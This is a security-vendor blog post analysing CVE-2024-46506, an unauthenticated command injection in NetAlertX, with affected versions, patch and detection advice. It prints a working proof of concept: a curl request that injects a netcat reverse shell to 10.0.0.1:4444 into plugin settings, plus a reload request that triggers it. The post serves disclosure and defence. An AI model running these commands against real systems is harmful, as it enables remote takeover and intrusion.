Logic scanner now available! Try it out
Back
CVE Analysis - 7 min read

NetAlertX Under Siege: Unauthenticated RCE Exploit (CVE-2024-46506)

A critical unauthenticated command injection vulnerability in NetAlertX (CVE-2024-46506) is actively exploited, enabling attackers to execute arbitrary commands remotely.

ZeroPath Security Research

ZeroPath Security Research

2025-05-13
NetAlertX Under Siege: Unauthenticated RCE Exploit (CVE-2024-46506)

Introduction

NetAlertX, a widely adopted open-source network monitoring tool, faces a critical security threat with CVE-2024-46506, an unauthenticated remote code execution vulnerability actively exploited in the wild. This severe flaw allows attackers to execute arbitrary commands remotely, posing a significant risk to thousands of deployments.

Affected Systems and Versions

NetAlertX versions 23.01.14 through 24.x before 24.10.12 are vulnerable. Specifically, the vulnerability affects configurations utilizing the 'util.php' endpoint without proper authentication checks.

Technical Information

The vulnerability arises from the absence of authentication in the 'util.php' file's 'saveSettings' function. Attackers exploit this by directly sending unauthenticated POST requests, modifying plugin configurations such as 'backup_handler', which executes system commands without input sanitization:

curl -X POST http://target:20211/php/server/util.php \
  -d 'function=savesettings&plugins={"backup_handler":{"command":"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"}}'

Triggering payload execution via a reload request:

curl http://target:20211/php/server/util.php?function=reload

This results in arbitrary command execution, often granting root-level access.

Proof of Concept

A working PoC exploit is demonstrated above using curl commands. Attackers can easily adapt this method to deploy reverse shells or other malicious payloads.

Patch Information

Users must immediately upgrade to NetAlertX version 24.10.12 or later, available from the official repository:

The patch introduces robust authentication checks and input sanitization to mitigate exploitation.

Detection Methods

Monitor logs for POST requests to 'util.php' with 'function=savesettings'. Investigate unusual processes spawned by NetAlertX, particularly those involving reverse shells or unexpected outbound connections.

Vendor Security History

NetAlertX has faced challenges with timely and complete security patches. Initial patches for CVE-2024-46506 were bypassed, necessitating subsequent updates. This highlights the importance of vigilant patch management and security auditing for users of NetAlertX.

References

Ready for effortless AppSec?

Get a live ZeroPath tour.

Schedule a demo with one of the founders Dean Valentine Raphael Karger Nathan Hrncirik Yaacov Tarko to get started.

Schedule a demo